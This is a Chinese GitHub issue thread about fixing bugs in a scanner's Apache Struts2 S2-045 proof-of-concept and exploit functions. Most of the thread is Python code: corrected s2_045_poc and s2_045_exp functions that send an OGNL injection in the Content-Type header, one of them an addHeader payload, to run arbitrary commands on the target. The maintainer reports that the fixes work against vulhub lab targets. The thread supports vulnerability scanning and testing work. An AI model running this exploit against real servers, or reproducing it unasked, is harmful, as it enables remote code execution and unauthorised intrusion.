ApacheStruts2.py S2-045 poc有错误

Question

ApacheStruts2.py S2-045 poc有错误

shadow1ng opened this issue 3 years ago · comments

self.headers2 = {
            'User-Agent': self.ua,
            'Content-Type': self.payload_s2_045.replace("RECOMMAND", cmd)
        }
        try:
            self.req= requests.get(self.url, headers=self.headers1, timeout=self.timeout, verify=False)
            if r"54289" in self.request.headers['FUCK']:

self.req 应该为self.request

影舞者 · Answer 1 · Fri Feb 26 2021 13:19:19 GMT+0800 (China Standard Time)

s2_045_exp 也有问题
s2_046_exp 是正常的。
稍微把s2_045_exp 按s2_046_exp 的格式改了下，就正常了

 self.headers2 = {
            'User-Agent': self.ua,
            'Content-Type': self.payload_s2_045.replace("RECOMMAND", cmd)
        }
        try:
            self.req = requests.get(self.url, headers=self.headers2, timeout=self.timeout, verify=False)
            self.raw_data = dump.dump_all(self.req).decode('utf-8', 'ignore')
            verify.exploit_print(self.req.text, self.raw_data)

之乎者也 · Answer 2 · Fri Feb 26 2021 15:37:27 GMT+0800 (China Standard Time)

感谢 @shadow1ng 师傅的纠正
发现确实poc和exp都有问题
已经修复poc为:

    def s2_045_poc(self):
        self.threadLock.acquire()
        md = random_md5()
        cmd = "echo " + md
        headers_1 = {
            'User-Agent': self.ua,
            'Content-Type': self.payload_s2_045.replace("RECOMMAND", cmd)
        }
        headers_2 = {
            'User-Agent': self.ua,
            'Content-Type': '${#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].'
                            'addHeader("FUCK",233*233)}.multipart/form-data'
        }
        try:
            self.request = requests.post(self.url, headers=headers_1, timeout=self.timeout, verify=False)
            if md in misinformation(self.request.text, md):
                self.vul_info["vul_data"] = dump.dump_all(self.request).decode('utf-8', 'ignore')
                self.vul_info["prt_resu"] = "PoCSuCCeSS"
                self.vul_info["vul_payd"] = self.payload_s2_045.replace("RECOMMAND", cmd)
                self.vul_info["prt_info"] = "[rce] [cmd:" + cmd + "]"
            else:
                self.request = requests.post(self.url, headers=headers_2, timeout=self.timeout, verify=False)
                if r"54289" in self.request.headers['FUCK']:
                    self.vul_info["vul_data"] = dump.dump_all(self.request).decode('utf-8', 'ignore')
                    self.vul_info["prt_resu"] = "PoCSuCCeSS"
                    self.vul_info["vul_payd"] = '${#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("FUCK",233*233)}.multipart/form-data'
                    self.vul_info["prt_info"] = "[rce] [cmd: 233*233]"
            verify.scan_print(self.vul_info)
        except requests.exceptions.Timeout:
            verify.timeout_print(self.vul_info["prt_name"])
        except requests.exceptions.ConnectionError:
            verify.connection_print(self.vul_info["prt_name"])
        except Exception:
            verify.error_print(self.vul_info["prt_name"])
        self.threadLock.release()

修复exp为:

    def s2_045_exp(self, cmd):
        vul_name = "Apache Struts2: S2-045"
        headers = {
            'User-Agent': self.ua,
            'Content-Type': self.payload_s2_045.replace("RECOMMAND", cmd)
        }
        try:
            self.req = requests.post(self.url, headers=headers, timeout=self.timeout, verify=False)
            self.raw_data = dump.dump_all(self.req).decode('utf-8', 'ignore')
            verify.exploit_print(self.req.text, self.raw_data)
        except requests.exceptions.Timeout:
            verify.timeout_print(vul_name)
        except requests.exceptions.ConnectionError:
            verify.connection_print(vul_name)
        except Exception as e:
            verify.error_print(vul_name)

目前以vulhub靶场为例均可

师傅的fscan很强很棒很喜欢